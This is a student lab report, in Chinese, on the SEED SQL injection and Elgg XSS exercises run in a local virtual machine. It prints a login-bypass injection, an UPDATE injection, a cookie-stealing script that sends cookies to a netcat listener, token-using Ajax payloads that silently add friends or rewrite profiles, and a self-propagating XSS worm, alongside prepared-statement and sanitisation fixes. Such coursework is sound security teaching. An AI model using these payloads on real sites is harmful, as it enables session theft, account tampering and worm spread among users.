20252804 2025-2026-2 《网络攻防实践》实践十报告
1.实践内容
1.1 Web 应用体系结构与安全威胁
(1)Web 应用体系结构
分为客户端(浏览器)、Web 服务器、应用服务器、数据库服务器四层架构。
核心流程:浏览器发送 HTTP 请求 → Web 服务器接收 → 转发至应用服务器 → 应用服务器调用数据库 → 结果逐层返回。
(2)Web 应用安全威胁分类
应用层攻击:SQL 注入、XSS 跨站脚本、命令注入、文件上传漏洞等。
服务器攻击:Web 服务器(Apache/IIS)漏洞、中间件漏洞。
数据层攻击:数据库漏洞、敏感信息泄露。
客户端攻击:钓鱼、恶意脚本、浏览器漏洞利用。
1.2 Web 应用信息收集
| 信息收集类型 | 具体内容 |
|---|---|
| 基础信息收集 | 域名、IP、端口、服务器版本、操作系统 |
| 目录与文件探测 | 扫描后台、备份文件、配置文件、测试页面 |
| 应用信息探测 | 脚本语言、CMS 类型、数据库类型、用户账号、接口路径 |
| 核心工具 | Nmap、DirBuster、Burp Suite、AWVS、Wappalyzer |
1.3 主流 Web 应用攻击技术
(1)SQL 注入攻击
原理:用户输入未过滤,拼接进 SQL 语句执行,导致数据库被操控。
攻击步骤:判断注入点 → 猜解表名 / 字段 → 获取数据 → 提权 / 写文件。
攻击类型:联合查询、报错注入、布尔盲注、时间盲注、堆叠查询。
危害:数据泄露、篡改、删除,服务器权限获取。
(2)XSS 跨站脚本攻击
原理:向网页插入恶意脚本,在用户浏览器执行,窃取 Cookie、会话、信息。
分类:反射型(一次性,URL 触发);存储型(存入数据库,持久触发);DOM 型(前端 DOM 解析触发)
危害:会话劫持、钓鱼、内网探测、蠕虫传播。
2.实践过程
2.1 准备阶段
在百度网盘或者这个链接下载SEEDUbuntu-16.04-32bit.zip
https://seedsecuritylabs.org/lab_env.html
创建新的虚拟机,选择磁盘位置为SEEDUbuntu-16.04-32bit.vmdk,成功安装!
修改主机名为自己姓名
2.2 SEED SQL注入攻击与防御实验
一个Web应用程序托管在 www.SEEDLabSQLInjection.com。该Web应用程序是一个简单的员工管理应用程序。员工可以通过此Web应用程序查看和更新数据库中的个人信息。此Web应用程序主要有两个角色:管理员是特权角色,可以管理每个员工的个人资料信息。员工是一般角色,可以查看或更新自己的个人资料信息。完成以下任务:
(1)熟悉SQL语句: 已经创建了一个名为Users的数据库,其中包含一个名为creditential的表。该表存储了每个员工的个人信息。在此任务中,需要使用数据库来熟悉SQL查询。
①登录数据库并展示库。密码为seedubuntu
mysql -u root -p
show databases;
②查看Users数据库和里面的表。发现确实有一个名为creditential的表。
use Users;
show tables;
③查看credential表中的所有条目
select * from credential;
④输入条件,查询Name为‘Boby’的相关信息。
select * from credential where Name = 'Boby';
(2)对SELECT语句的SQL注入攻击:上述Web应用存在SQL输入漏洞,任务是在不知道密码的情况下登陆该Web应用程序。
①浏览器打开www.SEEDLabSQLInjection.com网页。
②按F12进入开发者模式,任意输入用户名和密码点击登录。发现登录过程中是使用 get请求访问unsafe_home.php。
③打开unsafe_home.php查看页面源代码。发现是直接将用户输入拼接到SQL语句中。这里存在典型的SQL注入漏洞。
④当输入Admin'#作为用户名时,实际执行的SQL变为:SELECT ... FROM CREDENTIAL WHERE name='Admin'#'。也就是只要数据库中存在用户名为Admin的记录,攻击者即可绕过密码验证获取管理员权限。
(3)对UPDATE语句的SQL注入攻击:通过员工的更新个人界面实施UPDATE语句的SQL注入攻击。
①任意输入点击保存。发现登录过程中同样使用get请求访unsafe_edit_backend.php。
②打开unsafe_edit_backend.php查看页面源代码。
cd /var/www/SQLInjection/
cat unsafe_edit_backend.php
③需要注入的sql语句为UPDATE credential SET nickname='$input_nickname',email='$input_email',address='$input_address', Password='$hashed_pwd', PhoneNumber='$input_phonenumber' WHERE ID=$id; 。构造 $input_nickname的值。
',Salary='20252804' where name='Admin'#
④发现用户名为Admin的用户薪水数据改变为前面注入的信息。
(4)SQL对抗:修复上述SQL注入攻击漏洞。
①修改unsafe_home.php中的内容。(这里unsafe_home.php文件默认为只读,因此要先修改unsafe_home.php文件权限为可以编辑,方法见3.学习中遇到的问题和解决方案)
$sql = $conn->prepare("SELECT id, name, eid, salary,birth, ssn, phoneNumber,address,email,nickname,Password From credential WHERE name= ? and Password=?;");
$sql->bind_param("ss",$input_uname,$hashed_pwd);
原始内容:
修改后内容:
②测试是否还存在SQL注入漏洞。输入Admin’#发现不能成功登录了,说明漏洞修复成功。
2.3 SEED XSS跨站脚本攻击实验(Elgg)
为了演示攻击者可以利用XSS漏洞做什么,我们在预先构建的Ubuntu VM映像中设置了一个名为Elgg的Web应用程序。在本实验中,需要利用此漏洞对经过修改的Elgg发起XSS攻击,攻击的最终目的是在用户之间传播XSS蠕虫,这样,无论是谁查看的受感染用户个人资料都将被感染。
(1)发布恶意消息,显示警报窗口:在Elgg配置文件中嵌入一个JavaScript程序,以便当另一个用户查看该配置文件时,将执行JavaScript程序并显示一个警报窗口。
①登录网址http://www.xsslabelgg.com,使用alice用户名登陆网站,密码为seedalice
②点击头像,进入edit profile界面。在Brief description中输入XSS攻击代码。
<script>alert("20252804txc");</script>
③点击保存后即可显示xss攻击信息弹窗。
(2)弹窗显示cookie信息:将cookie信息显示。
将Brief description中的信息更改,点击保存则可以弹出cookie信息。
<script> alert(document.cookie);</script>
(3)窃取受害者的cookies:将cookie发送给攻击者。
在命令行开启监听。将Brief description中的信息更改,点击保存。再登录boby的账户,查看alice账户信息时成功窃取到了boby用户的cookies。
窃取当前网页的 Cookie,并发送到本地 5555 端口的监听程序上。
nc -l 5555 -v
<script> document.write('<img src=http://127.0.0.1:5555?c=' + escape(document.cookie) + '>'); </script>
(4)成为受害者的朋友:使用js程序加受害者为朋友,无需受害者干预,使用相关的工具了解Elgg加好友的过程。
①在alice账户中选择“more”-“Members”,按F12查看网络流信息,选择boby添加为朋友,发现编号信息。
②删掉好友回到初始状态。根据上述信息构造payload,在alice账户的about me中填写,并保存。
页面加载后会偷偷调用目标网站接口,自动帮当前登录用户关注 ID 为 44或者45 的用户,全程用户无感知。
44代表自身,45代表boby
<script type="text/javascript">
window.onload = function () {
var Ajax=null;
var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
var token="&__elgg_token="+elgg.security.token.__elgg_token;
var sendurl="http://www.xsslabelgg.com/action/friends/add?friend=45" + ts + token;
Ajax=new XMLHttpRequest();
Ajax.open("GET",sendurl,true);
Ajax.setRequestHeader("Host","www.xsslabelgg.com");
Ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
Ajax.send();
}
</script>
③登录alice的主页,发现已经和自己以及boby成为好友
(5)修改受害者的信息:使用js程序使得受害者在访问Alice的页面时,资料无需干预却被修改。
①在alice账户的about me中填写,并保存。
获取当前登录用户的身份信息、安全令牌,构造篡改个人资料的请求,自动悄悄发送请求,把用户简介改成:This have been cracked by 20252804tangxinci.
<script type="text/javascript">
window.onload = function(){
//JavaScript code to access user name, user guid, Time Stamp __elgg_ts
//and Security Token __elgg_token
var userName=elgg.session.user.name;
var guid="&guid="+elgg.session.user.guid;
var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
var token="&__elgg_token="+elgg.security.token.__elgg_token;
var content=token+ts+"name="+userName+"&description=<p>This have been cracked by 20252804tangxinci.</p>&accesslevel[description]=2&briefdescription=&accesslevel[briefdescription]=2&location=&accesslevel[location]=2&interests=&accesslevel[interests]=2&skills=&accesslevel[skills]=2&contactemail=&accesslevel[contactemail]=2&phone=&accesslevel[phone]=2&mobile=&accesslevel[mobile]=2&website=&accesslevel[website]=2&twitter=&accesslevel[twitter]=2"+guid;
var sendurl = "http://www.xsslabelgg.com/action/profile/edit";
var aliceGuid=45;
if(elgg.session.user.guid!=aliceGuid){
//Create and send Ajax request to modify profile
var Ajax=null;
Ajax=new XMLHttpRequest();
Ajax.open("POST",sendurl,true);
Ajax.setRequestHeader("Host","www.xsslabelgg.com");
Ajax.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
Ajax.send(content);
}
}
</script>
②登录boby账户并访问alice主页后,发现alice主页个人信息已经被强制更改
(6)编写XSS蠕虫。
①在alice账户的about me中填写,并保存。
这是一段XSS蠕虫病毒代码,不仅会偷偷篡改个人资料,还会把自身代码复制到个人简介里,实现自我复制、无限传播,访问者打开页面就会中招。
<script id="worm" type="text/javascript">
window.onload = function(){
var headerTag = "<script id=\'worm\' type=\'text/javascript\'>";
var jsCode = document.getElementById("worm").innerHTML;
var tailTag = "</" + "script>";
var wormCode = encodeURIComponent(headerTag + jsCode + tailTag);
var userName=elgg.session.user.name;
var guid="&guid="+elgg.session.user.guid;
var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
var token="&__elgg_token="+elgg.security.token.__elgg_token;
//Construct the content of your url.
var content= token + ts + "&name=" + userName + "&description=<p>20252804tangxinci"+ wormCode + "</p> &accesslevel[description]=2&briefdescription=&accesslevel[briefdescription]=2&location=&accesslevel[location]=2&interests=&accesslevel[interests]=2&skills=&accesslevel[skills]=2&contactemail=&accesslevel[contactemail]=2&phone=&accesslevel[phone]=2&mobile=&accesslevel[mobile]=2&website=&accesslevel[website]=2&twitter=&accesslevel[twitter]=2" + guid;
var sendurl = "http://www.xsslabelgg.com/action/profile/edit"
alert(content)
var aliceGuid=45;
if(elgg.session.user.guid!=aliceGuid){
var Ajax=null;
Ajax=new XMLHttpRequest();
Ajax.open("POST",sendurl,true);
Ajax.setRequestHeader("Host","www.xsslabelgg.com");
Ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
Ajax.send(content);
}
}
</script>
②登录boby账户并访问alice主页后,可以看到个人信息已经被强制修改
(7)对抗XSS攻击。
①登录admin账号,链接为www.xsslabelgg.com/admin,“plugin”——>“HTMLawed” ——>改为"Deactivate" 。(注意跟之前登录方式不一样)
②重新模拟XSS攻击后发现攻击失败。
3.学习中遇到的问题及解决
-
问题1:unsafe_home.php文件不可编辑,导致试了很多遍都不能成功保存修改后的文件
-
问题1解决方案:文件只读,修改权限为可以编辑即可解决。
-
chmod u+w unsafe_home.php -
![image]()
-
问题2:虚拟机里面不能粘贴本机的剪切板信息,安装vm tools也没有成功
-
问题2解决方案:最后选择共享文件夹成功实现。
sudo mkdir -p /mnt/hgfs
nautilus /mnt/hgfs
sudo vmhgfs-fuse .host:/Desktop /mnt/hgfs -o allow_other
cd /mnt/hgfs
ls
4.实践总结
本次实验我深入了解了两种常见Web漏洞的原理、攻击方式及危害。SQL注入利用用户输入未过滤的漏洞,拼接恶意SQL语句,可非法查询、篡改甚至删除数据库数据,破坏数据安全;XSS跨站脚本攻击通过注入恶意脚本代码,在用户浏览器中执行,窃取cookie、劫持会话、篡改页面内容。
浙公网安备 33010602011771号